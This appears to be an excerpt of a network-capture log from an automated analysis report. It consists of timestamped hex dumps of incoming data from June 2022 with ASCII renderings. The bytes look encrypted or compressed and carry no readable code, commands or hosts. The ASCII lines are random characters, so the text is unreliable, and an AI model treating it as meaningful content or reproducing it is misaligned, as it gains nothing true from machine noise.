                                                                                                                                                                                        2022-06-10 05:52:17 UTC21INData Raw: 62 11 3e 38 ef b5 ee 89 d2 1b b4 36 04 12 33 28 03 23 d8 d4 47 f9 2e 25 1c 73 02 ac 2c 57 8a ff 9c 72 a9 8a 9a f1 eb 2d 92 78 b0 7f 79 ec 58 84 c6 5b 2a 31 93 2c dd 98 2f a6 b3 77 38 7f b0 c4 a2 b5 a0 f2 b7 00 ac 49 ff 10 85 18 8f 60 a6 4d 83 51 8f 68 81 22 71 9a 35 63 3b ab 10 90 98 ba 40 cc b4 0c 1a d2 c5 c9 64 d0 ec c8 cd 78 f8 57 e1 dd 14 8b 76 46 cd 5e e0 dc f4 3b 2f 24 44 8a 7f 05 ef ca 24 7c 7b d1 59 00 cc 24 e9 4a 0f eb 6a 0f ac 83 04 18 fd e2 80 99 02 77 d6 a2 9f 82 be 68 f6 a5 11 54 ba 02 10 bc 8c b7 57 a1 fd 2c 7e 7f 9e 6f 89 ea 1f 3e f5 e0 f8 e8 89 b6 f2 5a 7c 2e 07 44 ef 23 49 82 a3 af 4b 18 9c e4 ae 88 37 bb f2 d9 67 2f df 8c ce 12 1e d7 97 fb 37 b3 fe e5 e2 66 25 5c 2f a5 cf 28 09 3b d3 57 9f 11 d0 ad 3a a7 b0 be d8 f7 74 32 80 3a 67 f1 d0
                                                                                                                                                                                        Data Ascii: b>863(#G.%s,Wr-xyX[*1,/w8I`MQh"q5c;@dxWvF^;/$D$|{Y$JjwhTW,~o>Z|.D#IK7g/7f%\/(;W:t2:g
                                                                                                                                                                                        2022-06-10 05:52:17 UTC22INData Raw: b0 63 07 90 44 f7 3e e3 1b db f3 fa 6e 3b 7c 52 55 72 ee 2f e7 99 28 ac 89 32 a1 c3 db b3 c8 19 6a 6b 1f 9b e9 21 9e b2 46 c1 47 59 59 87 c5 ff 90 72 df c1 bd 61 b3 a3 c0 b8 02 27 e3 c3 f7 83 6c 1f 0d 92 69 af d3 51 97 12 a5 2f 1e 3c f4 2d e2 2d 54 07 8d ef 27 f5 96 bf 1d 09 46 0c b7 79 8b 3d c1 7b c3 a3 dc 02 8d 29 60 24 b8 a3 84 a3 99 32 c7 70 0d b0 66 41 6b 26 f1 71 84 e4 7d 48 f1 77 b8 e2 a9 99 46 fa 42 8e b2 e4 61 b3 0c 16 71 28 49 56 0d 89 91 5b 76 0d 44 11 1d 1e 3a 45 ee b2 3f a2 31 85 5c cd fd 4c 0e a7 1d 94 f7 c5 a3 26 5f 26 70 1d cc 1a eb 3e 82 6a d4 28 7e 12 a7 71 29 3c bf fe 26 ca 6b 5d fb b8 f6 ce 20 eb 3f 37 32 8c 3b bc 45 30 28 9b 23 32 b1 04 25 c7 fd 03 3a a4 d1 cc 32 7e cc 42 10 b3 dc b7 cb 3b 10 52 f4 8a 68 ae d9 98 1d 4d eb 0d 35 4b 30
                                                                                                                                                                                        Data Ascii: cD>n;|RUr/(2jk!FGYYra'liQ/<--T'Fy={)`$2pfAk&q}HwFBaq(IV[vD:E?1\L&_&p>j(~q)<&k] ?72;E0(#2%:2~B;RhM5K0
                                                                                                                                                                                        2022-06-10 05:52:17 UTC24INData Raw: 10 49 dc 58 36 5e 81 07 8c 25 bb 6f d9 34 9c ba 05 9a da 2d 97 9b 95 ef d7 19 04 61 b8 d0 1e cb 41 4d 0d 2c d7 d4 f9 76 a5 ba 89 43 ab a7 76 06 24 28 5f 7b 89 5e af 6c 76 67 eb 39 c5 c6 f6 4a 99 92 2b c5 1b ba d3 62 11 3e b1 d8 07 d9 82 d2 f3 80 b2 57 13 b0 ec a2 66 17 24 2a 75 bb c1 8d 8c 97 fa 2c 55 c6 4a 63 8d a9 8a 9a c6 f1 2d 92 7e a0 8f 74 ec 58 8a 8d f7 a4 b0 af 5f 8c 70 6a 25 b2 77 eb b7 63 4f f9 3e 16 fd 9c d8 69 76 5b c8 88 b4 cc df c9 7d 25 e9 9c 51 63 0c 7a 88 61 36 e3 16 ab 29 6e ce 48 a8 0c 66 16 89 c5 f2 de 24 13 37 ca e9 95 f9 e0 22 eb b1 76 5e de ce 33 48 c1 3b d0 4b cf b0 73 41 ae 6a 5f 58 f0 95 d2 24 dc 66 ac ba d4 7e 95 08 b7 92 52 56 e6 42 75 66 fd 97 50 e2 94 45 3b 0c ab a5 ee 31 d0 71 7a d2 52 74 2f c7 fd d3 96 e7 24 4e da 31 78 e0
                                                                                                                                                                                        Data Ascii: IX6^%o4-aAM,vCv$(_{^lvg9J+b>Wf$*u,UJc-~tX_pj%wcO>iv[}%Qcza6)nHf$7"v^3H;KsAj_X$f~RVBufPE;1qzRt/$N1x
                                                                                                                                                                                        2022-06-10 05:52:17 UTC25INData Raw: b9 20 86 de 85 a2 d0 0d 31 e0 26 9c 79 07 3d 71 18 f5 cd 28 53 17 f0 30 a0 0e 9a eb 7c 88 92 89 00 c3 4e 42 af d7 fe a1 c4 f0 8a e5 5b 76 d5 73 df 69 e2 7d 32 26 1a 92 0e 1e fe 23 7e af 4b bc 48 01 82 5f 5a 28 15 fc aa f0 6f 38 be 8b 33 e1 24 0c 92 cc 65 bf f4 26 55 e7 1e 0f 72 3a 64 b6 b8 c0 cf 5f 00 35 e6 3b 6b 7c 14 99 a4 68 3e 06 17 2d 59 d4 53 93 ad 1c f7 b7 35 c1 10 e3 4b 25 a2 fc 26 89 c3 f7 4b 59 b3 7f f8 6b 54 7c 68 40 42 8b a2 e0 3c 91 cd f3 d7 ab 73 90 b5 99 d2 ed d5 5a 9e b9 7e a8 71 0e c8 55 13 52 63 ae 15 dc f7 12 75 7f 6b f9 a4 12 a8 56 e6 1e a4 31 71 d1 61 7c 14 d4 66 83 b7 14 c6 03 88 ae 99 46 51 a8 8e b2 05 15 36 14 2b 32 85 35 c2 47 37 2e 37 11 0d c9 fc a8 d3 0f aa 07 76 1d f2 89 db c5 31 f5 ce ca 20 5a 24 62 73 82 64 06 ef 4b 90 1a 5f
                                                                                                                                                                                        Data Ascii: 1&y=q(S0|NB[vsi}2&#~KH_Z(o83$e&Ur:d_5;k|h>-YS5K%&KYkT|h@B<sZ~qURcukV1qa|fFQ6+25G7.7v1 Z$bsdK_
                                                                                                                                                                                        2022-06-10 05:52:17 UTC26INData Raw: cd a2 74 d4 41 dc 6e b7 59 52 4c 16 c3 31 17 c2 50 17 30 d4 91 a0 77 bd 8b 2c 40 57 ee c0 2c 4d de 5a c8 88 42 2e cc 22 de 3c 55 d2 1e e1 7d 07 ed e2 09 68 38 94 1b 7b 8f 31 71 ac ce 49 fb 79 ed aa b9 e9 f9 e2 3a b5 b6 23 d7 79 03 76 c6 48 8e bf 9f 27 f5 27 31 51 4e 6c 2e 9c 1b 65 9c b6 fa 7d 01 47 53 da 4f e9 28 12 a8 ea 91 7a d9 28 ef 7d 91 df 83 ee f1 5b 2e b7 e7 c4 a6 57 d6 69 7d eb 20 1e 1c f2 d1 0f 6c 7a 10 56 28 60 aa 14 bd fe 63 b0 15 87 3b fb 45 4d a9 93 ca c0 89 67 4a 50 0d f8 ae dc 9f 7c ec 41 a1 d0 2a 37 65 84 8c f4 4e 73 ee 37 f8 f2 78 00 9b dd 31 08 49 78 a7 3d 10 bc 8b f3 ad 22 31 b0 b2 01 fb 71 5d 4a cf e6 50 02 34 48 ff bc 86 c2 8f 98 59 cf 42 32 73 c7 f3 91 b4 a6 2f 09 6e ac af 97 e5 d2 41 ff e5 a2 70 03 8b 4a 75 e8 15 b4 5a b9 94 55 e1
                                                                                                                                                                                        Data Ascii: tAnYRL1P0w,@W,MZB."<U}h8{1qIy:#yvH''1QNl.e}GSO(z(}[.Wi} lzV(`c;EMgJP|A*7eNs7x1Ix="1q]JP4HYB2s/nApJuZU
                                                                                                                                                                                        2022-06-10 05:52:17 UTC28INData Raw: 63 7f b3 4b 9f 22 bd 06 43 e5 16 da c1 31 28 b2 67 44 fb 8e bb c8 4b 67 65 8d 17 12 77 69 23 92 ac c2 74 a7 03 02 d9 74 65 e0 03 34 b1 66 3c e4 23 43 be 4a ec c1 27 4b 88 34 bd b2 26 07 d2 bd 18 89 8e 3a 2a d7 82 5c 8d 5a c0 63 51 22 f2 63 85 ea 03 74 07 57 23 ff a7 76 f5 58 46 94 cb 5f a1 34 d2 b1 3b e6 e3 06 13 da 32 40 40 b8 f3 a8 0b 2c 91 e6 08 2a 2e 11 cc be 7d f2 b6 b0 e6 7f 43 1b 0a 0d 23 dd fd d1 69 79 f2 f2 7f a3 5d 66 06 c0 38 e2 8b 9b 6f c4 78 bf cc ed f2 0c fd ad b7 22 46 25 01 34 23 6b c8 82 42 f0 41 5c 96 b6 9c 65 a8 f0 38 42 10 d0 02 a1 62 c1 4f f7 1a 7a 54 9f 36 bf 4c 71 4b 95 01 ad eb 48 2b 0e 85 1d 20 e4 bd c7 88 97 12 f5 06 5b 04 61 df c5 1a 56 2b dd eb 3d 01 c8 4b 64 f0 7f 55 72 09 99 5d 45 c0 28 22 c1 59 74 f4 7a e3 70 72 e6 7c c3 6d
                                                                                                                                                                                        Data Ascii: cK"C1(gDKgewi#tte4f<#CJ'K4&:*\ZcQ"ctW#vXF_4;2@@,*.}C#iy]f8ox"F%4#kBA\e8BbOzT6LqKH+ [aV+=KdUr]E("Ytzpr|m
                                                                                                                                                                                        2022-06-10 05:52:17 UTC29INData Raw: 64 24 5b c0 68 5c 8b f1 60 f4 8f f8 cb d8 c6 74 e1 80 79 46 43 7e 99 cc 4d d5 e8 da 2f 16 89 1a 8e 23 7c 92 e0 1d 64 0e ca 57 aa 4e e8 15 3e 83 1d b4 41 75 00 a3 4a 37 26 2e 5e 36 76 4d 50 1d 0b af ab 49 22 ac 16 72 46 a9 db 4c 07 cd 43 a6 6e 0d 5e 6f 33 be b4 29 4b e2 db 15 05 c7 be 8b ef 2f 9c 62 00 13 c7 3e 31 6f 6f a7 e8 cc 22 a2 c4 af 58 5a a1 93 a6 49 19 77 ff f4 b9 e4 85 70 0d 8b fc c1 89 59 45 21 69 11 f6 ef 58 70 a2 d4 37 57 80 0d c6 d3 4d b7 42 b3 5f 89 ee 08 e5 25 71 b3 0c c4 19 63 19 63 59 95 47 53 b2 64 31 a4 ca 9c 16 83 c4 ff 6d 1b f4 54 de ab df 07 89 5a 49 8f 91 af d3 9c db 22 2d 61 48 4b 1a 5f 38 82 7a 93 11 e0 c3 52 d6 4a 22 31 be 9f 72 83 96 ee 1e 04 44 64 7f d1 b4 80 07 5e af d1 f5 ff cd 00 a3 a1 d0 74 ec c3 f9 1c 81 b1 85 96 0d a7 48
                                                                                                                                                                                        Data Ascii: d$[h\`tyFC~M/#|dWN>AuJ7&.^6vMPI"rFLCn^o3)K/b>1oo"XZIwpYE!iXp7WMB_%qccYGSd1mTZI"-aHK_8zRJ"1rDd^tH
                                                                                                                                                                                        2022-06-10 05:52:17 UTC30INData Raw: 27 82 26 da 80 d4 93 5a 5a 81 df 12 a2 55 e0 3f 6d 93 26 5a c8 8a 9c 70 77 ef 83 e3 e1 22 d0 a3 d0 71 ee 7d 4b b9 6d 40 50 01 5d f8 a6 ef b4 74 2c 82 05 55 db c5 b1 f3 03 84 a0 69 34 3c ec 43 dd 47 bf 12 11 3f 5e 31 2f 88 d6 87 bb b3 a9 3d 71 05 83 31 b4 be 2e 9d ad bf 62 68 81 3e d8 6a 5b c9 ff 78 f9 09 9b b1 b0 2d a4 1d 9e 4a 4d 30 6b ef 48 8a eb aa 1b 48 c0 70 2c 67 84 37 ca 3e 07 42 27 df ea 5b c0 dc 00 c8 17 8a 1c cf 4f 86 d3 10 66 bc 72 31 3c 56 4f 2f 23 8c b2 2c 56 61 f4 5c 4d 7f 99 6d 65 50 9e 88 d8 70 d6 81 db 01 ad c4 5c a2 a3 c4 da 9b 85 e5 d0 1e 5c ce 1a 70 39 84 bc c7 91 69 71 b6 40 7e 0e 27 3b 39 5d 90 86 d4 a6 f3 33 18 5f 36 e5 d2 0a 7e 5f 6f cb ca 8a 38 13 b4 cd 06 b1 49 76 51 41 90 3a 81 7a c7 0d 36 7b 33 6c 1e 3f 1d de 79 5d 25 c9 c1 d2
                                                                                                                                                                                        Data Ascii: '&ZZU?m&Zpw"q}Km@P]t,Ui4<CG?^1/=q1.bh>j[x-JM0kHHp,g7>B'[Ofr1<VO/#,Va\MmePp\\p9iq@~';9]3_6~_o8IvQA:z6{3l?y]%
                                                                                                                                                                                        2022-06-10 05:52:17 UTC31INData Raw: 09 06 54 89 3e 58 2b f4 4b 2e 5b c0 a3 c9 43 15 4e 13 f4 40 cb 31 a4 3a 07 93 1e 6c bf 61 e9 aa 46 2d 83 57 dc 8a 24 05 a0 03 40 db cc 44 3b fd 80 05 48 f0 ba 01 b1 b2 c7 19 4e 92 19 a8 af a3 71 d3 e6 2c 5f 7a 71 d0 78 aa 2d e1 0c 8f f1 26 30 b2 fb 42 88 9d 79 87 0a 44 45 ca 21 11 2c 5d a0 fb 60 00 3a fc 1b 33 bc 74 e7 e9 a7 4b 52 c5 dc e8 75 17 ea b4 9b 91 41 b0 0f 74 cb d6 74 f0 3f 27 a9 75 c4 83 dd 9b d3 7c 48 63 a8 c1 3e a7 a6 ae d6 b8 c1 4c d3 60 bf 49 4f 11 e1 04 ff 27 e6 5f 80 13 77 bd fe 5e a4 d8 93 d2 a7 b0 a8 76 b9 7e 9b 67 30 54 71 04 27 24 ef a0 81 71 42 d6 70 9e 43 cd e7 0d 20 01 b2 b3 3f 7f 3d d6 16 e3 48 a5 a6 03 53 43 70 8c 5b 8f 0a 5e 3d 37 88 bc a4 3c 49 9a ce 21 70 a9 4b 16 62 0c 17 91 7c a9 9a c7 aa f9 bb 13 2c 37 a7 56 2d e6 02 2b 66
                                                                                                                                                                                        Data Ascii: T>X+K.[CN@1:laF-W$@D;HNq,_zqx-&0ByDE!,]`:3tKRuAtt?'u|Hc>L`IO'_w^v~g0Tq'$qBpC ?=HSCp[^=7<I!pKb|,7V-+f
                                                                                                                                                                                        2022-06-10 05:52:17 UTC33INData Raw: 99 2f c3 6a c7 57 db 7a 5c a6 30 41 b5 6a 9c 19 10 c2 63 ac af 01 52 3d 92 2e 30 15 46 82 cf 9f 13 d3 c6 5b 5b ee ba f7 79 43 53 40 ca 96 5c c4 83 7e 26 b0 6f 89 ec ef 1a 37 77 90 a8 04 23 01 e1 6b 83 3f 13 04 57 77 d4 f4 c4 b6 a6 1f 5a d9 45 73 e5 a9 0b 6b 8a 5a 50 b7 72 88 e8 18 7d 09 d5 dc 35 cd 83 7e 13 f5 75 8d b0 a1 fd 65 a5 17 69 ce ad 41 39 ba f1 f0 7c 71 e2 93 bb 9e 7b 46 68 a5 dd 38 e5 9e 0e 35 c6 3c 86 41 69 d5 1a 7b 5a e4 72 72 4d 56 c2 57 f6 86 29 38 67 5b a3 a3 3e 8a 67 51 b0 b3 73 ca ca 7c 5b a2 e4 15 f0 8b b1 21 13 af be f4 66 6f 6c 8d 5c 1a 60 2f d5 89 39 f7 2d be d4 a0 d9 8a 46 98 ad 64 dd 43 9e 04 f2 b3 f2 8c 09 92 89 0e 39 cd d2 a0 ba 99 08 7c ec b0 86 ae 71 81 b0 21 0b ce 11 ce c3 35 f1 9b 51 63 13 02 88 8c 56 a5 7d 40 76 f3 aa ef c8
                                                                                                                                                                                        Data Ascii: /jWz\0AjcR=.0F[[yCS@\~&o7w#k?WwZEskZPr}5~ueiA9|q{Fh85<Ai{ZrrMVW)8g[>gQs|[!fol\`/9-FdC9|q!5QcV}@v
                                                                                                                                                                                        2022-06-10 05:52:17 UTC33INData Raw: 66 75 98 6e 26 1a 01 de a3 06 1a 89 2a 27 24 0c ee c9 31 71 43 6f aa 5f 25 7e e6 8a 1d ab 61 64 2d 01 2e 3f a7 8c eb 53 ab c7 5f 2a 7b 3c 89 67 bd ae f2 07 a4 72 71 f3 92 a7 d5 d2 a3 bf 1c 88 8d a8 71 ff d3 29 19 e5 15 86 06 f1 61 41 4d 8e 7b 08 db 77 f9 63 52 6d be 02 bb d1 18 9f d7 bc ca e8 4b 88 de 83 fe bc 92 69 70 69 22 b4 c3 d8 85 d3 08 96 40 a6 28 5a 20 fe 8d 67 dc f3 48 8a 75 5f 34 8c 3d 42 cf 66 03 42 94 86 35 3b 10 a6 e1 25 89 cb 47 ce 6c 20 f0 ac a4 48 cd a5 7b 94 e1 7a e1 72 f1 be 60 29 c8 96 74 f7 b9 1c e0 71 95 8d 08 aa 76 53 36 76 88 17 ef 86 8b 4a bf c0 0a 5a ee bb ed 7b 90 20 89 56 c4 d6 4a d7 16 9e e4 1a 8a ee d8 16 87 11 8d a4 3d 6b 8e d1 9b e8 1d 1a 72 87 1e ca af 59 81 69 57 4a 2f 88 0e f3 e6 5b 64 9f 06 93 ce 11 cf 80 1c 01 88 b3 d0
                                                                                                                                                                                        Data Ascii: fun&*'$1qCo_%~ad-.?S_*{<grqq)aAM{wcRmKipi"@(Z gHu_4=BfB5;%Gl H{zr`)tqvS6vJZ{ VJ=krYiWJ/[d
                                                                                                                                                                                        2022-06-10 05:52:17 UTC35INData Raw: 5d 64 18 a4 1c d5 16 ce fd b3 f0 54 fb 6c e8 09 b1 e9 f5 5d c4 31 62 35 7d a1 a0 a5 f9 87 1c 36 ee fb 1f 33 0e d8 de d3 76 3a 44 75 34 81 7a d7 28 b7 48 6a 53 64 dc b9 a5 ba 44 fa ca f2 e9 b0 19 16 07 5b 97 ec a8 20 14 b1 bb d1 3b ff 12 b6 d7 9e d6 d6 6b a3 c0 53 39 2e 66 03 0e 10 5e 97 fe 07 17 68 c5 8f 16 aa 58 d0 09 a5 6f 49 9b c5 1a 73 3f 1c fc 31 e3 d4 5a 0b eb 99 99 c2 b7 e8 17 7b a9 1f 95 4f 64 ab 64 ac 7f e6 ff 08 e1 d2 69 c2 5e c7 13 8b 44 8a 36 df a4 98 7c 48 7c d2 38 fb af c8 47 2e 39 70 4d 38 ab bd 81 43 c9 c4 b7 90 11 df f4 73 e9 f3 bb 86 90 7e a3 bd ea 65 55 a2 e2 17 bc 60 1d 88 d9 24 d9 5f b6 0d 52 f3 3a a3 92 1d a6 1a 20 f4 bb 69 8f d7 2f 9f 84 5d c5 f3 bf 01 f6 74 26 fb 8e a2 54 5c 96 09 b1 74 64 49 ba 5f fe 18 2d f8 5b 66 5d 44 f0 54 9f
                                                                                                                                                                                        Data Ascii: ]dTl]1b5}63v:Du4z(HjSdD[ ;kS9.f^hXoIs?1Z{Oddi^D6|H|8G.9pM8Cs~eU`$_R: i/]t&T\tdI_-[f]DT
                                                                                                                                                                                        2022-06-10 05:52:17 UTC36INData Raw: 82 18 6c 49 3c 25 81 24 28 1c f8 53 23 74 b6 5e da 2f 94 1b 15 30 97 94 f9 12 a3 84 9a 37 ae f8 b8 4c 35 ab 87 2b ad 3f f2 6b 6d de 1a 9b d3 0b aa be be 91 d9 dc e4 42 7d 2a 35 50 cc b9 5e 4b 85 90 9d dd d6 50 96 89 09 83 a7 c4 b7 cf 16 ba 41 06 0a e3 40 ef 39 85 64 0d 7d 50 30 47 39 aa 9d e0 a8 b6 59 5e a2 c0 51 fb a5 fb c7 c7 49 b2 f5 a0 56 3a 33 16 68 cd 41 d5 78 1b a5 54 77 0b eb 85 37 68 57 ae 23 bd ac 65 25 2e 25 9c 12 3c 95 24 59 99 2c 4b 16 12 9d 5a 95 a3 a6 e6 23 6f 3f de 5a 50 bf b3 3e 92 66 16 ad 68 8d 70 31 25 1e 46 90 36 50 57 c1 d6 67 b4 ac 91 d3 35 3d e3 1f a5 bc be e4 73 3f 38 ed 99 dd 8b 37 8c d3 b1 2d 32 da ec 3a 82 1f 8f 8e fd d8 46 dc 69 23 e6 84 80 a3 35 a8 7e c2 e9 8e de be 84 b3 59 61 c3 64 0c cf f1 14 c6 34 27 b0 0c 54 e6 b2 79 66
                                                                                                                                                                                        Data Ascii: lI<%$(S#t^/07L5+?kmB}*5P^KPA@9d}P0G9Y^QIV:3hAxTw7hW#e%.%<$Y,KZ#o?ZP>fhp1%F6PWg5=s?87-2:Fi#5~Yad4'Tyf
                                                                                                                                                                                        2022-06-10 05:52:17 UTC37INData Raw: 6b b9 70 18 82 31 6f 05 4b f2 89 1c b5 27 38 df c0 07 2c 54 50 3e c0 27 45 0b ab d5 5a 0f 77 f8 5e b7 05 00 11 f3 63 83 39 e7 4b ce 90 77 b9 b2 21 78 57 d4 9c 40 0f b5 42 55 3c 72 dd 85 04 18 36 32 00 2c 25 a1 38 90 2c 52 2d 4a cd 75 ca c9 3b a6 a3 c7 af 4d 7a 1f 2a 89 c9 a6 70 e0 a9 5c 76 17 e5 42 fa 12 64 06 90 90 b8 f6 3d 21 1a 81 f8 bb 9f e8 a6 fb eb 18 22 e6 a0 6d 65 dc 3a 89 4e e6 14 f9 d9 0c b4 d0 90 dd fb d0 bc c2 5b 47 07 d2 e3 66 3c 1c 3f 33 9f d6 4d f3 a2 c0 5d e9 66 b1 4e 3f ea 85 61 34 49 55 47 22 aa 13 aa db 14 f1 84 1d 48 9b 2c 0a 07 25 be b2 93 b0 ae 6e a1 32 1f 6e d4 4f ce 8d 73 ff 17 24 4b 63 82 80 72 15 fa 2a 41 55 5f 11 b6 48 4c 8e 27 13 9f f1 5e ba 81 7c 48 7c fd 46 8c ae c8 ae 37 4d d8 96 e6 42 b3 0a 04 e9 f3 8c 9c 9a 90 55 7f 5f 1d
                                                                                                                                                                                        Data Ascii: kp1oK'8,TP>'EZw^c9Kw!xW@BU<r62,%8,R-Ju;Mz*p\vBd=!"me:N[Gf<?3M]fN?a4IUG"H,%n2nOs$Kcr*AU_HL'^|H|F7MBU_
                                                                                                                                                                                        2022-06-10 05:52:17 UTC38INData Raw: 1d 3e 00 65 69 c1 2a 69 48 19 0b 8b 5f 8f 66 70 c6 21 5b 9e 4f d3 d9 4b a3 63 b7 25 31 1c ac 8a b5 db c5 d2 a2 81 f4 6b a6 1b 47 64 b8 6a 68 28 f1 db 15 ed 01 cc 6c 13 ac 58 e3 0b f3 b1 21 66 b0 09 da 10 33 dd a8 8e 83 de 9a d4 0b 76 3a dd f0 67 54 a8 fc 85 70 3e 42 20 8e 78 8d 00 ce 94 46 9c cd ca 29 c6 1c 23 a8 7f 05 57 43 45 f1 d6 e8 35 c9 33 cc db 6a 23 5b 96 12 96 43 91 f5 f9 17 c9 4f d9 cf 10 2c e9 8b d5 d4 93 ff a6 c7 7e 11 26 a9 d7 eb 88 bd 15 12 00 02 ac 6c 1c 36 d6 ac de af 18 b7 66 aa 79 8b 92 24 e3 ae 97 ee 3a 66 33 c8 82 d2 1b 53 5f 41 12 33 ab 42 f7 5e d6 d1 fa 2e 25 f3 b3 67 20 52 2e d5 48 17 27 f5 57 00 66 1a eb 92 f7 2e 57 9b 87 76 08 49 ab 09 31 7b fc a2 71 6b ae 6a fc f6 c0 00 67 9a 8e f2 a0 d4 d4 72 3b 4c 43 6f b8 5d 37 4e f9 ff 50 8d
                                                                                                                                                                                        Data Ascii: >ei*iH_fp![OKc%1kGdjh(lX!f3v:gTp>B xF)#WCE53j#[CO,~&l6fy$:f3S_A3B^.%g R.H'Wf.WvI1{qkjgr;LCo]7NP
                                                                                                                                                                                        2022-06-10 05:52:17 UTC40INData Raw: ec 2f 52 c5 f0 89 9b f0 16 fa c0 8b b9 a7 7f 16 39 73 41 39 70 66 0e be 93 cc 98 31 6c 08 eb 3a 45 b3 28 73 4c 56 49 66 4a 86 97 d9 de 40 a2 20 71 db 28 66 41 b5 b6 16 60 08 d5 fb 3d 0b a2 50 ed 5d 25 24 25 bd 7c e0 37 5c 48 ed 92 71 23 5b b8 49 7c 35 d8 b4 8f 51 aa 9b f5 af a4 43 24 08 76 1d a0 1c 82 9c e1 f2 b4 12 08 a2 a7 8f 5a 94 43 8e f8 a8 f2 51 b8 a4 b8 d1 1f 39 36 a0 0e 46 46 d8 ab c5 61 9a a1 d9 46 d3 ec a4 a8 72 90 bf 41 2f f9 88 3d 72 bb c7 85 30 d0 a8 9e 93 30 c8 5f 86 42 18 ba 80 79 2f 2b d0 6e 14 9f 1b 0e fa da 65 5d 0c f2 fc 0e 05 cf e5 7b e4 f3 7d 49 50 64 6f 06 37 8b 51 5b bf c8 04 49 dd 7a b8 54 9b f6 f2 38 36 87 57 17 0e b1 75 57 ff 91 f1 1b de 61 b1 e8 fe 03 1e b5 8e ef 49 ff e3 68 9a 01 5f 56 24 6f 14 fe a6 d3 9d e9 6f 4a 1f 10 51 58
                                                                                                                                                                                        Data Ascii: /R9sA9pf1l:E(sLVIfJ@ q(fA`=P]%$%|7\Hq#[I|5QC$vZCQ96FFaFrA/=r00_By/+ne]{}IPdo7Q[IzT86WuWaIh_V$ooJQX
                                                                                                                                                                                        2022-06-10 05:52:17 UTC41INData Raw: fe 18 5a 79 45 87 b3 77 8f be 44 af fd ee 60 d0 93 43 92 6c 65 6d 2b e0 26 9d 2b 2b 3c 36 af 5b d5 2e 68 5c 8b 71 df fc aa 9f cb d8 16 3d 76 e3 8e 92 44 71 1d 15 39 de 82 59 06 d6 e1 74 0a ec ff 56 e8 1e 60 5c ca 57 aa 27 16 ea c1 8e c9 9f c2 fa 5d 0a 6f a8 80 8c f9 56 9a cc 3f d1 19 2a 6b 6f 36 76 a2 f2 f6 b0 d9 c5 81 c1 c5 2b 94 7b e6 b8 35 8e b4 2a d3 14 24 ea 05 81 6d 75 10 27 2d 62 ef c3 3f b4 9e c4 78 39 41 65 35 76 22 a7 dd 17 4a aa f2 12 de a3 ea 31 41 19 7b 8f 5c b8 63 1c 0a 8d 03 1a 68 b9 63 1e 81 39 4a 49 5f 93 a4 0b c2 b6 9d fc 48 ee b4 0e 63 47 55 72 77 d2 eb 93 f0 52 a3 f4 f9 1d 83 57 e7 4f 10 a5 67 a0 51 9c 92 76 28 b8 95 0c 17 23 9a 76 8f d7 0d c1 96 75 46 4d 32 66 81 a6 8c 5b 29 48 ed 2b 7e 9c 3d e3 b3 81 31 0a 39 66 b8 9f 8a b4 92 bf cb
                                                                                                                                                                                        Data Ascii: ZyEwD`Clem+&++<6[.h\q=vDq9YtV`\W']oV?*ko6v+{5*$mu'-b?x9Ae5v"J1A{\chc9JI_HcGUrwRWOgQv(#vuFM2f[)H+~=19f
                                                                                                                                                                                        2022-06-10 05:52:17 UTC42INData Raw: d0 84 8e c7 9a 9c 35 ad 94 7b 5f 47 f5 19 e7 de e9 6b 14 ef 8f 56 82 f2 6b 12 bc ed f8 17 e3 86 26 ec 80 d4 33 5b 5a 81 61 53 30 b6 1f 90 84 57 ca 1e 58 84 18 e0 36 c7 d3 04 6c 94 2e 0a c7 3d fb a3 d5 3b a9 cf 11 d1 df 28 48 bc 39 f1 a6 94 d6 ff 8b 3a e4 be 42 ed e5 a6 c5 91 67 0e 35 4d fa 5e 3d 3e 5e e1 87 d8 2e 03 31 a5 16 84 23 fa 80 29 eb 5b 5a a3 c9 78 8e 38 0c f0 c0 39 a3 92 a1 c2 80 29 5c f4 ee 99 30 f9 db a6 92 5f e8 17 b4 28 60 3c 87 41 0d 35 cc ba 24 96 6f df 07 a9 84 a3 a8 5f b5 ee 56 1b c2 93 07 0f 47 99 95 6e ed 59 c4 bb e0 f0 79 9a 65 51 bf 90 57 4f de 2e 36 71 dd cb 5f a7 23 a6 16 fb 93 df 65 f9 9b 46 af ab 68 e7 c7 31 f9 da d0 3a 56 06 a8 fa bc a6 57 85 a4 6d f1 19 fe 1f 2a ae 4b da cd ec b9 d4 aa 2c ab ad 23 06 90 91 db 6d 71 1a db 70 3e
                                                                                                                                                                                        Data Ascii: 5{_GkVk&3[ZaS0WX6l.=;(H9:Bg5M^=>^.1#)[Zx89)\0_(`<A5$o_VGnYyeQWO.6q_#eFh1:VWm*K,#mqp>
                                                                                                                                                                                        2022-06-10 05:52:17 UTC44INData Raw: f6 85 01 15 f2 1d fb 40 2b 8b 65 26 1a 1d 2d ff 3b 70 ee 19 99 6a c6 f3 a7 02 97 00 34 74 fe 78 6d 1f 7a 5d ab 5b 28 27 6f 48 b3 ca 7e d8 09 d9 f8 d0 bb a0 d6 52 f8 e5 9b 05 85 95 1d e7 b1 ec 0e 3c 18 c1 c0 43 73 64 4d 1c 01 4b 02 ad 88 2e 1c 0a e8 5d 58 a7 41 90 e4 e6 7f 67 45 03 89 a6 92 7d 81 e1 8c 25 18 05 1d a8 67 70 7e 5b 36 c7 f8 cb b0 5b f9 7e 60 b9 03 a2 f8 58 f0 c4 90 01 d0 15 d3 00 50 fb 65 39 67 69 db e2 d6 8f a5 a7 ce 21 9c 7b 18 1f 84 98 96 45 1c d6 21 a9 a0 25 98 ab c5 96 06 92 6f da b5 25 94 18 77 27 3f 9e 78 08 d4 89 c0 e7 c3 dc cf 21 2f b0 2a ca 17 24 ea be d8 ca 29 f0 24 05 a2 0d 8e 02 a9 fb d9 79 39 ec db 5c 05 01 a7 5e 5e d8 e8 ec fa f8 bf 66 bc 3a 24 86 20 80 c6 6b 1b 84 ae 44 12 96 c5 58 fa 61 32 a2 23 97 56 80 0d c2 c1 98 fa 63 5a
                                                                                                                                                                                        Data Ascii: @+e&-;pj4txmz][('oH~R<CsdMK.]XAgE}%gp~[6[~`XPe9gi!{E!%o%w'?x!/*$)$y9\^^f:$ kDXa2#VcZ
